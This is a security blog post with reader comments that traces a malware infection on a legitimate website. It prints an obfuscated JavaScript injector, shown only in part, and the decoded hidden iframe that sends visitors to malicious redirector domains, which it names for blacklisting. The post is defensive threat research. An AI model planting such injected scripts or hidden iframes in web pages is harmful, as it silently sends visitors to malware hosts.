Saturday, September 1, 2012

Suspicious Movement in ASN40034 (infector to tr2.4voip.biz & fwdservice.com)

It's beginning from infected hosting homepage of hxxp://dansenbijjansen.com/
It is a good honest site. Sadly, it's having the suspicious code at 
hxxp://dansenbijjansen.com/foto/index.php?
I downloaded to examine to find the below JS/Code:
<script>el=document.createElement("div");try{a}catch(qq) {el.appendChild(document.createElement("p")); el.appendChild(document.createTextNode("q")); el.insertBefore(document.createTextNode("l"),el.childNodes[1]);with(el) {appendChild(document.createTextNode("eva"));}} k=el.lastChild.nodeValue;ar="A4 2E\"lTb?we Cy";ar2="R8c8c140c116c192c96c148c176c160c128c76c44c168c92c132c172c44 c92c16c24c44c76c44c168c92c68c80c200c28c52c172c124c52c76c44c96c152c32 c176c148c200c152c156c84c108c100c156c88c8c8c8c140c116c104c52c76c44c104 c96c156c180c8c8c120c192c44c24c68c44c192c88c8c8c8c148c176c160c128c76 c44c168c92c132c40c104c140c92c44c96c20c48c140c116.....and so on....
↑was easily to deobfuscate to find the below iframer...
<iframe src='hxxp://tr2.4voip.biz/in.cgi?2' width='10' height='10' style= 'visibility:hidden;position:absolute;left:0;top:0;'></iframe>
Which making me checking the hxxp://tr2.4voip.biz/in.cgi?2 to find- the multiple malicious links as per coded below: ↑The above links is obviously for the purpose to make sure users are - redirected to the below HTML file with another JS code: It will lead us to the link of:
hxxp://fwdservice.com/main.php?dmn=4voip.biz&folio=7POYGN0G2&gkwrf&p_bkt=
What's this? We have many reference about it in the urlquery below: This is actually a url forwarder service used to redirect request to some- other URL for the downloading or etc purpose. I checked to the recorded URL- And found the format of the query like:
hxxp://fwdservice.com/main.php?dmn=lejebolig.net&folio= \ 7POJ4E717&gkwrf=hxxp://www.ansa.no/ANSAland/Danmark/Lokallag/\ Kobenhavn/A-bo-i-Kobenhavn/Finne_bolig_i_Kobenhavn/&p_bkt=
Or....
hxxp://fwdservice.com/main.php?dmn=sniegul.com&folio= 7POYGN0G2&gkwrf=http://priv.ckp.pl/moonforge/&p_bkt=
In our case with the certain ticket (folio=7POYGN0G2) and - domain (dmn=dmn=4voip.biz) forwarded us to special path in 4voip.biz host. Be free to check and analyzed further of what you can get from that host. The interesting part is tr2.4voip.biz and fwdservice.com are in the - same network : With sharing same IP address with lame malicious domain like:
netsecur.com wwwfaceboko.com yourmoneybox.net
Blacklisting 4voip.biz and fwdservice.com will be a nice idea!

3 comments:

  1. Checking : http://dansenbijjansen.com/foto/index.php?
    AcE=1

    Malware Section Start
    ML1=4
    Malware Section End

    Results=2
    Analysis Time=0.0200159577422324
    1.28492844306389

    ReplyDelete
  2. Thank you for the scanning, sachin. Nice tools.

    ReplyDelete
  3. Thanks Unixfreaxjp.

    This one has been developed in-house and is algorithm based - doessnt use any Database. All the AVs rely on using a database.

    As of now this is a standalone exe and we are working on creating a Web-Based service (Free as in free air).

    For the sake of stats - I have tested not less than 8 Lac urls with less than .01% false positives.

    My only issue is I need malicious URLs, and for that I have to scrounge various sites.

    You can find more info about this tool on the blog.escanav.com/2012/08/13/surla/

    and this is still in testing - non-production stage. :|
    Regards
    Sachin R.

    ReplyDelete